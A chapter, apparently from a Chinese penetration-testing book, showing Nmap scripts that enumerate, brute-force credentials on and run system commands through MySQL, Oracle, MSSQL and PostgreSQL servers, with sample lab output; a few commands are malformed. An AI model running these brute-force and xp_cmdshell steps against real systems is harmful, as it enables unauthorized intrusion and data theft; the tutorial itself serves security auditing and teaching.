本章知识点
本章节将介绍Nmap脚本在数据库渗透方面的应用,Nmap脚本基本会涉及各个方面的应用,其对数据库的支持也是自然不会少的。通过本章学习,读者可以了解Nmap对数据库安全的作用。
本章脚本
表8.1所示为本章节所需Nmap命令表,为方便读者查阅,笔者特此整理。
表8.1 本章所需脚本选项(名称)
脚 本 |
解 释 |
---|---|
mysql-databases |
MySQL列举数据库 |
mysql-variables |
列举MySQL变量 |
mysql-empty-password |
检查MySQL密码 |
mysql-brute |
审计MySQL密码 |
mysql-audit |
审计MySQL安全配置 |
oracle-brute |
审计Oracle密码 |
ms-sql-brute |
审计msSQL密码 |
ms-sql-empty-password |
检查msSQL空密码 |
ms-sql-tables |
读取msSQL数据 |
ms-sql-xp-cmdshell |
msSQL执行系统命令 |
pgsql-brute |
审计PgSQL密码 |
表8.2所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——MySQL列举数据库。
表8.2 本节所需命令
脚 本 |
解 释 |
---|---|
mysql-databases |
MySQL列举数据库 |
mysql-variables |
列举MySQL变量 |
mysql-empty-password |
检查MySQL密码 |
mysql-brute |
审计MySQL密码 |
mysql-audit |
审计MySQL安全配置 |
oracle-brute |
审计Oracle密码 |
ms-sql-brute |
审计msSQL密码 |
ms-sql-empty-password |
检查msSQL空密码 |
ms-sql-tables |
读取msSQL数据 |
ms-sql-xp-cmdshell |
msSQL执行系统命令 |
pgsql-brute |
审计PgSQL密码 |
使用命令“nmap -p3306 --script mysql-databases --script-args mysqluser=root,mysqlpass 目标”进行Mysql数据库的列举工作。
root@Wing:~# nmap -p3306 --script mysql-databases --script-args mysqluser=root,mysqlpass 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 20:20 CST
Nmap scan report for 192.168.84.1
Host is up (0.0016s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql
| test
| cmcc
|_ information_schema
Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
root@Wing:~#
如果我们已知目标MySQL的账号和密码,就可以轻易地夺取目标MySQL的所有数据库。如果目标数据库段端口更改了,我们也需要使用-p参数指定相应的数据库端口,使用mysqluser指定目标数据库账号,mysqlpass指定目标数据库密码,如果密码为空则不需填写任何东西,最后指向目标IP地址。
root@Wing:~# nmap -p3310 --script mysql-databases --script-args mysqluser=root,mysqlpass 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 20:32 CST
Nmap scan report for 192.168.84.1
Host is up (0.0017s latency).
PORT STATE SERVICE
3310/tcp open dyna-access
| mysql
| test
| cmcc
|_ information_schema
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
root@Wing:~#
从以上结果来看,目标MySQL存在4个库,分别是mysql、test、cmcc、information_schema。我们也可以直接连接到目标数据库进行查看,但是这需要具备相应的环境才可以,直接使用Nmap的脚本是相当方便的,这不是Nmap独有的脚本,在Metasploit中也有相应的模块可以查看数据库。
![]()
在Nmap输入多行数据的时候,不需要用回车进行换行,Nmap会自动将多行数据进行换行处理。
表8.3所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——列举MySQL变量。
表8.3 本节所需命令
脚 本 |
解 释 |
---|---|
mysql-databases |
MySQL列举数据库 |
mysql-variables |
列举MySQL变量 |
mysql-empty-password |
检查MySQL密码 |
mysql-brute |
审计MySQL密码 |
mysql-audit |
审计MySQL安全配置 |
oracle-brute |
审计Oracle密码 |
ms-sql-brute |
审计msSQL密码 |
ms-sql-empty-password |
检查msSQL空密码 |
ms-sql-tables |
读取msSQL数据 |
ms-sql-xp-cmdshell |
msSQL执行系统命令 |
pgsql-brute |
审计PgSQL密码 |
使用命令“nmap -p3306 --script=mysql-variables目标”即可列举目标MySQL变量。
root@Wing:~# nmap -p3306 --script=mysql-variables 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 20:39 CST
Nmap scan report for 192.168.84.1
Host is up (0.0016s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-variables:
| auto_increment_increment: 1
| auto_increment_offset: 1
| automatic_sp_privileges: ON
| back_log: 50
| basedir: /usr/
| binlog_cache_size: 32768
| bulk_insert_buffer_size: 8388608
| character_set_client: latin1
| character_set_connection: latin1
| character_set_database: latin1
| .
| .
| .
| version_comment: (Debian)
| version_compile_machine: powerpc
| version_compile_os: debian-linux-gnu
|_ wait_timeout: 28800
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
root@Wing:~#
使用mysql-variables脚本可以轻易查询到MySQL数据库所有的变量。如果目标端口改变了则需要使用-p指定相应的端口。
root@Wing:~# nmap -p3310 --script=mysql-variables 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 20:41 CST
Nmap scan report for 192.168.84.1
Host is up (0.0016s latency).
PORT STATE SERVICE
3310/tcp open mysql
| mysql-variables:
| auto_increment_increment: 1
| auto_increment_offset: 1
| automatic_sp_privileges: ON
| back_log: 50
| basedir: /usr/
| binlog_cache_size: 32768
| bulk_insert_buffer_size: 8388608
| character_set_client: latin1
| character_set_connection: latin1
| character_set_database: latin1
| .
| .
| .
| version_comment: (Debian)
| version_compile_machine: powerpc
| version_compile_os: debian-linux-gnu
|_ wait_timeout: 28800
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
root@Wing:~#
如果仍无法确定可以使用-sV扫描端口。
root@Wing:~# nmap -sV --script=mysql-variables 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 20:42 CST
Nmap scan report for 192.168.84.1
Host is up (1.0s latency).
Not shown: 979 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.9 ((APMServ) mod_ssl/2.2.9 OpenSSL/ 0.9.8h PHP/5.2.6)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open ssl/http Apache httpd 2.2.9 ((APMServ)mod_ssl/2.2.9 OpenSSL/ 0.9.8h PHP/5.2.6)
445/tcp open netbios-ssn
514/tcp filtered shell
843/tcp open unknown
902/tcp open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp open vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1029/tcp open msrpc Microsoft Windows RPC
1037/tcp open msrpc Microsoft Windows RPC
1038/tcp open msrpc Microsoft Windows RPC
1169/tcp open tripwire?
3306/tcp open mysql MySQL (unauthorized)
5678/tcp open rrac?
7000/tcp open afs3-fileserver?
8000/tcp open tcpwrapped
10000/tcp open snet-sensor-mgmt?
| mysql-variables:
| auto_increment_increment: 1
| auto_increment_offset: 1
| automatic_sp_privileges: ON
| back_log: 50
| basedir: /usr/
| binlog_cache_size: 32768
| bulk_insert_buffer_size: 8388608
| character_set_client: latin1
| character_set_connection: latin1
| character_set_database: latin1
| .
| .
| .
| version_comment: (Debian)
| version_compile_machine: powerpc
| version_compile_os: debian-linux-gnu
|_ wait_timeout: 28800
Service detection performed. Please report any incorrect results at http://nmap.org/submit/
.
Nmap done: 1 IP address (1 host up) scanned in 298.43 seconds
root@Wing:~#
如果使用-sV则需要花费较长的时间。
若需要设定目标的账号密码,需要加入mysql-brute或者mysql-empty-password选项指定账号密码。
表8.4所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——检查MySQL密码。
表8.4 本节所需命令
脚 本 |
解 释 |
---|---|
mysql-databases |
MySQL列举数据库 |
mysql-variables |
列举MySQL变量 |
mysql-empty-password |
检查MySQL密码 |
mysql-brute |
审计MySQL密码 |
mysql-audit |
审计MySQL安全配置 |
oracle-brute |
审计Oracle密码 |
ms-sql-brute |
审计msSQL密码 |
ms-sql-empty-password |
检查msSQL空密码 |
ms-sql-tables |
读取msSQL数据 |
ms-sql-xp-cmdshell |
msSQL执行系统命令 |
pgsql-brute |
审计PgSQL密码 |
使用命令“nmap -p3306 --script=mysql-empty-password目标”即可检查目标MySQL服务的密码。
root@Wing:~# nmap -p3306 --script=mysql-empty-password 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 20:46 CST
Nmap scan report for 192.168.84.1
Host is up (0.0017s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-empty-password:
| anonymous account has empty password
|_ root account has empty password
Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds
root@Wing:~#
该脚本用于检查MySQL是否是空密码,或者密码是否为root,或允许匿名登录,是一个MySQL安全性的检查脚本,根据以上返回的结果可以得知目标MySQL数据库的密码为空,是可以任意进行登录并且没有限制的。
如果您无法确定目标开放的端口号,可以用-sV选项进行扫描。
root@Wing:~# nmap -sV --script=mysql-empty-password 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 20:53 CST
Nmap scan report for 192.168.84.1
Host is up (1.0s latency).
Not shown: 979 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.9 ((APMServ) mod_ssl/2.2.9 OpenSSL/ 0.9.8h PHP/5.2.6)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open ssl/http Apache httpd 2.2.9 ((APMServ) mod_ssl/2.2.9 OpenSSL/ 0.9.8h PHP/5.2.6)
445/tcp open netbios-ssn
514/tcp filtered shell
843/tcp open unknown
902/tcp open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
912/tcp open vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1029/tcp open msrpc Microsoft Windows RPC
1037/tcp open msrpc Microsoft Windows RPC
1038/tcp open msrpc Microsoft Windows RPC
1169/tcp open tripwire?
3306/tcp open mysql MySQL (unauthorized)
|_mysql-empty-password: Host 'pgos' is not allowed to connect to this MySQL server
5678/tcp open rrac?
7000/tcp open afs3-fileserver?
8000/tcp open tcpwrapped
10000/tcp open snet-sensor-mgmt?
| mysql-empty-password:
| anonymous account has empty password
|_ root account has empty password
Service detection performed. Please report any incorrect results at http://nmap.org/submit/
.
Nmap done: 1 IP address (1 host up) scanned in 296.45 seconds
root@Wing:~#
如果知道端口号,可以使用-p选项指定。
![]()
一般情况下,我们会使用-F,-T4等选项快速地扫描目标端口,而不是直接使用-sV选项,直接使用-sV选项会跨越了信息搜集这一步。
表8.5所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——审计MySQL密码。
表8.5 本节所需命令
脚 本 |
解 释 |
---|---|
mysql-databases |
MySQL列举数据库 |
mysql-variables |
列举MySQL变量 |
mysql-empty-password |
检查MySQL密码 |
mysql-brute |
审计MySQL密码 |
mysql-audit |
审计MySQL安全配置 |
oracle-brute |
审计Oracle密码 |
ms-sql-brute |
审计msSQL密码 |
ms-sql-empty-password |
检查msSQL空密码 |
ms-sql-tables |
读取msSQL数据 |
ms-sql-xp-cmdshell |
msSQL执行系统命令 |
pgsql-brute |
审计PgSQL密码 |
使用命令“nmap --script=mysql-brute 目标”即可审计目标MySQL密码。
root@Wing:~# nmap --script=mysql-brute 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 20:59 CST
Nmap scan report for 192.168.84.1
Host is up (1.0s latency).
Not shown: 979 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
514/tcp filtered shell
843/tcp open unknown
902/tcp open iss-realsecure
912/tcp open apex-mesh
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1029/tcp open ms-lsa
1037/tcp open ams
1038/tcp open mtqp
1169/tcp open tripwire
3306/tcp open mysql
| mysql-brute:
| Accounts
| root:root - Valid credentials
5678/tcp open rrac
7000/tcp open afs3-fileserver
8000/tcp open http-alt
10000/tcp open snet-sensor-mgmt
Nmap done: 1 IP address (1 host up) scanned in 271.00 seconds
root@Wing:~#
该脚本用于MySQL弱口令,默认Nmap会扫描全部的端口用于查找MySQL端口,但是我们可以使用-p选项指定一个端口,也可以自定义账号密码字典。
root@linux:/usr/share/nmap/scripts# nmap -p 3306 --script=mysql-brute userdb=/root/ passdb.txt passdb=/root/pass.txt 192.168.0.110
Starting Nmap 6.25 ( http://nmap.org
) at 2014-06-12 21:50 CST
Illegal netmask value, must be /0 - /32 . Assuming /32 (one host)
Failed to resolve given hostname/IP: userdb=. Note that you can't use '/mask' AND '1-4,7,100-' style IP ranges. If the machine only has an IPv6 address, add the Nmap -6 flag to scan that.
…省略…
3306/tcp open mysql
| mysql-brute:
| Accounts
| root:root - Valid credentials
Nmap done: 1 IP address (1 host up) scanned in 163.77 seconds
表8.6所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——审计MySQL安全配置。
表8.6 本节所需命令
脚 本 |
解 释 |
---|---|
mysql-databases |
MySQL列举数据库 |
mysql-variables |
列举MySQL变量 |
mysql-empty-password |
检查MySQL密码 |
mysql-brute |
审计MySQL密码 |
mysql-audit |
审计MySQL安全配置 |
oracle-brute |
审计Oracle密码 |
ms-sql-brute |
审计msSQL密码 |
ms-sql-empty-password |
检查msSQL空密码 |
ms-sql-tables |
读取msSQL数据 |
ms-sql-xp-cmdshell |
msSQL执行系统命令 |
pgsql-brute |
审计PgSQL密码 |
使用命令“nmap -p 3306 --script mysql-audit --script-args "mysql-audit.username='root', \ mysql- audit.password='',mysql-audit.filename='nselib/data/mysql-cis.audit'" 目标”即可审计MySQL安全配置。
root@Wing:~# nmap -p 3306 --script mysql-audit --script-args "mysql-audit.username= 'root',\mysql-audit.password='',mysql-audit.filename='nselib/data/mysql-cis.audit'" 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 21:13 CST
Nmap scan report for 192.168.84.1
Host is up (0.0025s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-audit:
| CIS MySQL Benchmarks v1.0.2
| 3.1: Skip symbolic links => PASS
| 3.2: Logs not on system partition => PASS
| 3.2: Logs not on database partition => PASS
| 4.1: Supported version of MySQL => REVIEW
| Version: 5.1.54-1ubuntu4
| 4.4: Remove test database => PASS
| 4.5: Change admin account name => FAIL
| 4.7: Verify Secure Password Hashes => PASS
| 4.9: Wildcards in user hostname => FAIL
| The following users were found with wildcards in hostname
| root
| super
| super2
| 4.10: No blank passwords => PASS
| 4.11: Anonymous account => PASS
| 5.1: Access to mysql database => REVIEW
| Verify the following users that have access to the MySQL database
| user host
| root localhost
| root patrik-11
| root 127.0.0.1
| debian-sys-maint localhost
| root %
| super %
| 5.2: Do not grant FILE privileges to non Admin users => REVIEW
| The following users were found having the FILE privilege
| super
| super2
| 5.3: Do not grant PROCESS privileges to non Admin users => REVIEW
| The following users were found having the PROCESS privilege
| super
| 5.4: Do not grant SUPER privileges to non Admin users => REVIEW
| The following users were found having the SUPER privilege
| super
| 5.5: Do not grant SHUTDOWN privileges to non Admin users => REVIEW
| The following users were found having the SHUTDOWN privilege
| super
| 5.6: Do not grant CREATE USER privileges to non Admin users => REVIEW
| The following users were found having the CREATE USER privilege
| super
| 5.7: Do not grant RELOAD privileges to non Admin users => REVIEW
| The following users were found having the RELOAD privilege
| super
| 5.8: Do not grant GRANT privileges to non Admin users => PASS
| 6.2: Disable Load data local => FAIL
| 6.3: Disable old password hashing => PASS
| 6.4: Safe show database => FAIL
| 6.5: Secure auth => FAIL
| 6.6: Grant tables => FAIL
| 6.7: Skip merge => FAIL
| 6.8: Skip networking => FAIL
| 6.9: Safe user create => FAIL
| 6.10: Skip symbolic links => FAIL
|
|_ The audit was performed using the db-account: root
Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
root@Wing:~#
mysql-audit脚本用于对MySQL安全配置进行审计,-p参数指定目标端口,如果无法确定目标端口可以使用-sV选项进行扫描,mysql-audit.username选项指定的是目标数据库的账号,mysql-audit.password选项指定的是目标的数据库密码,如果数据库密码为空,则在选项中留空。
表8.7所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——审计Oracle密码。
表8.7 本节所需命令
脚 本 |
解 释 |
---|---|
mysql-databases |
MySQL列举数据库 |
mysql-variables |
列举MySQL变量 |
mysql-empty-password |
检查MySQL密码 |
mysql-brute |
审计MySQL密码 |
mysql-audit |
审计MySQL安全配置 |
oracle-brute |
审计Oracle密码 |
ms-sql-brute |
审计msSQL密码 |
ms-sql-empty-password |
检查msSQL空密码 |
ms-sql-tables |
读取msSQL数据 |
ms-sql-xp-cmdshell |
msSQL执行系统命令 |
pgsql-brute |
审计PgSQL密码 |
使用命令“nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=test 目标”即可进行审计Oracle密码。
root@Wing:~# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=test 192.168.126.131
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 21:29 CST
Nmap scan report for 192.168.126.131
Host is up (0.00032s latency).
PORT STATE SERVICE REASON
1521/tcp open oracle syn-ack
| oracle-brute:
| Accounts
| system:powell => Account locked
| haxxor:haxxor => Valid credentials
| Statistics
|_ Perfomed 157 guesses in 8 seconds, average tps: 19
Nmap done: 1 IP address (1 host up) scanned in 263.39 seconds
root@Wing:~#
oracle-brute脚本用于暴力破解Oracle密码,使用-p指向目标端口号。若需要自定义的账号密码字典进行暴力破解,需要userdb选项指定账号字典passdb指向密码字典。
root@Wing:~# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=test --script-args
userdb=/tmp/usernames.txt,passdb=/tmp/passwords.txt 192.168.126.131
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 21:29 CST
Nmap scan report for 192.168.126.131
Host is up (0.00032s latency).
PORT STATE SERVICE REASON
1521/tcp open oracle syn-ack
| oracle-brute:
| Accounts
| system:powell => Account locked
| haxxor:haxxor => Valid credentials
| Statistics
|_ Perfomed 157 guesses in 8 seconds, average tps: 19
Nmap done: 1 IP address (1 host up) scanned in 393.56 seconds
root@Wing:~#
表8.8所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——审计msSQL密码。
表8.8 本节所需命令
脚 本 |
解 释 |
---|---|
mysql-databases |
MySQL列举数据库 |
mysql-variables |
列举MySQL变量 |
mysql-empty-password |
检查MySQL密码 |
mysql-brute |
审计MySQL密码 |
mysql-audit |
审计MySQL安全配置 |
oracle-brute |
审计Oracle密码 |
ms-sql-brute |
审计msSQL密码 |
ms-sql-empty-password |
检查msSQL空密码 |
ms-sql-tables |
读取msSQL数据 |
ms-sql-xp-cmdshell |
msSQL执行系统命令 |
pgsql-brute |
审计PgSQL密码 |
使用命令“nmap -p 1433 --script ms-sql-brute --script-args userdb=name.txt, passdb= pass.txt 目标”即可审计msSQL密码。
root@Wing:~# nmap -p 1433 --script ms-sql-brute --script-args userdb=name.txt, passdb=pass.txt 192.168.84.1
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 21:44 PDT
Nmap scan report for 192.168.84.1
Host is up (0.00021s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-brute:
|_ sa:123456 => Login Success
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
root@Wing:~#
表8.9所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——检查msSQL空密码。
表8.9 本节所需命令
脚 本 |
解 释 |
---|---|
mysql-databases |
MySQL列举数据库 |
mysql-variables |
列举MySQL变量 |
mysql-empty-password |
检查MySQL密码 |
mysql-brute |
审计MySQL密码 |
mysql-audit |
审计MySQL安全配置 |
oracle-brute |
审计Oracle密码 |
ms-sql-brute |
审计msSQL密码 |
ms-sql-empty-password |
检查msSQL空密码 |
ms-sql-tables |
读取msSQL数据 |
ms-sql-xp-cmdshell |
msSQL执行系统命令 |
pgsql-brute |
审计PgSQL密码 |
使用命令“nmap -p 1433 --script ms-sql-empty-password 目标”检查msSQL空密码。
root@Wing:~# nmap -p 1433 --script ms-sql-empty-password 192.168.126.1
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 22:03 CST
Nmap scan report for 192.168.126.1
Host is up (0.00027s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-empty-password:
| [192.168.126.1\PROD]
|_ sa:<empty> => Login Success
Nmap done: 1 IP address (1 host up) scanned in 231.16 seconds
root@Wing:~#
使用ms-sql-empty-password脚本可以检查msSQL空密码,在上面的结果中可以得知目标主机的msSQL密码为空并且提示登录成功,脚本默认的账号为sa。
表8.10所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——读取msSQL数据。
表8.10 本节所需命令
脚 本 |
解 释 |
---|---|
mysql-databases |
MySQL列举数据库 |
mysql-variables |
列举MySQL变量 |
mysql-empty-password |
检查MySQL密码 |
mysql-brute |
审计MySQL密码 |
mysql-audit |
审计MySQL安全配置 |
oracle-brute |
审计Oracle密码 |
ms-sql-brute |
审计msSQL密码 |
ms-sql-empty-password |
检查msSQL空密码 |
ms-sql-tables |
读取msSQL数据 |
ms-sql-xp-cmdshell |
msSQL执行系统命令 |
pgsql-brute |
审计PgSQL密码 |
使用命令“nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql. Password=sa 目标”读取msSQL数据。
root@Wing:~# nmap –p 1433 –script ms-sql-tables –script-args mssql.username=sa, mssql.password=sa 192.168.126.131
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 21:51 PDT
Nmap scan report for 192.168.126.131
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-tables:
| pen
| table column type length
| ===== ====== ==== ======
| products id int 4
| products prodName varchar 50
| users userId int 4
| users sername varchar 50
| users userPass varchar 20
|
| Restrictions
| Output restricted to 2 tables (see mssql-tables.maxtables)
| Output restricted to 5 databases (see mssql-tables.maxdb)
|_ No filter (see mssql-tables.keywords)
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
root@Wing:~#
使用ms-sql-tables脚本就可以读取msSQL中的数据,其中,-p指定目标端口。分别用选项mssql.username、mssql.password指定账号密码。Nmap借助ms-sql-tables脚本可以轻易读取出相应的数据。
表8.11所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——msSQL执行系统命令。
表8.11 本节所需命令
脚 本 |
解 释 |
---|---|
mysql-databases |
MySQL列举数据库 |
mysql-variables |
列举MySQL变量 |
mysql-empty-password |
检查MySQL密码 |
mysql-brute |
审计MySQL密码 |
mysql-audit |
审计MySQL安全配置 |
oracle-brute |
审计Oracle密码 |
ms-sql-brute |
审计msSQL密码 |
ms-sql-empty-password |
检查msSQL空密码 |
ms-sql-tables |
读取msSQL数据 |
ms-sql-xp-cmdshell |
msSQL执行系统命令 |
pgsql-brute |
审计PgSQL密码 |
使用命令“nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql. password=sa,ms-sql-xp-cmdshell.cmd="ipconfig" 目标”即可借助msSQL执行系统命令。
root@Wing:~# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa, mssql.password=sa,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.126.1
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-12 21:55 PDT
Nmap scan report for 192.168.126.1
Host is up (0.00027s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-xp-cmdshell: (Use --script-args=mssql-xp-cmdshell.cmd='<CMD>' to change command.)
| ipconfig /all
| output
| ======
|
| Windows IP Configuration
|
| Host Name . . . . . . . . . . . . : wing
| Primary Dns Suffix . . . . . . . :
| Node Type . . . . . . . . . . . . : Hybrid
| IP Routing Enabled. . . . . . . . : No
| WINS Proxy Enabled. . . . . . . . : No
| DNS Suffix Search List. . . . . . : localdomain
|
| Ethernet adapter ,0\xDE\xA5:
|
| Connection-specific DNS Suffix . : localdomain
| Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
| Physical Address. . . . . . . . . : 00-0D-29-06-18-F3
| DHCP Enabled. . . . . . . . . . . : Yes
| Autoconfiguration Enabled . . . . : Yes
| IP Address. . . . . . . . . . . . : 192.168.126.1
| Subnet Mask . . . . . . . . . . . : 255.255.255.0
| Default Gateway . . . . . . . . . : 192.168.126.1
| DHCP Server . . . . . . . . . . . : 192.168.126.2
| DNS Servers . . . . . . . . . . . : 192.168.126.1
| Primary WINS Server . . . . . . . : 192.168.126.1
|_
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
root@Wing:~#
借助ms-sql-xp-cmdshell脚本,当权限足够大的时候我们就可以执行相关的系统命令,甚至添加删除管理员账号都可以准确执行,如果您想执行这个命令需要确定目标服务器开放msSQL服务端口并且您知道链接的账号密码。
表8.12所示为本章节所需Nmap命令表,表中加粗命令为本小节所需命令——审计PgSQL密码。
表8.12 本节所需命令
脚 本 |
解 释 |
---|---|
mysql-databases |
MySQL列举数据库 |
mysql-variables |
列举MySQL变量 |
mysql-empty-password |
检查MySQL密码 |
mysql-brute |
审计MySQL密码 |
mysql-audit |
审计MySQL安全配置 |
oracle-brute |
审计Oracle密码 |
ms-sql-brute |
审计msSQL密码 |
ms-sql-empty-password |
检查msSQL空密码 |
ms-sql-tables |
读取msSQL数据 |
ms-sql-xp-cmdshell |
msSQL执行系统命令 |
pgsql-brute |
审计PgSQL密码 |
使用命令“nmap -p 5432 --script pgsql-brute 目标”即可审计PgSQL密码。
root@Wing:~# nmap -p 5432 --script pgsql-brute 192.168.126.131
Starting Nmap 6.40 ( http://nmap.org
) at 2014-06-13 13:58 CST
Nmap scan report for 192.168.126.131
Host is up (0.00032s latency).
PORT STATE SERVICE
5432/tcp open pgsql
| pgsql-brute:
| root:<empty> => Valid credentials
|_ test:test => Valid credentials
MAC Address: 00:0C:29:E0:2E:76 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds
root@Wing:~#
pgsql-brute脚本是PgSQL数据库高效的密码审计工具,用于检查弱口令等。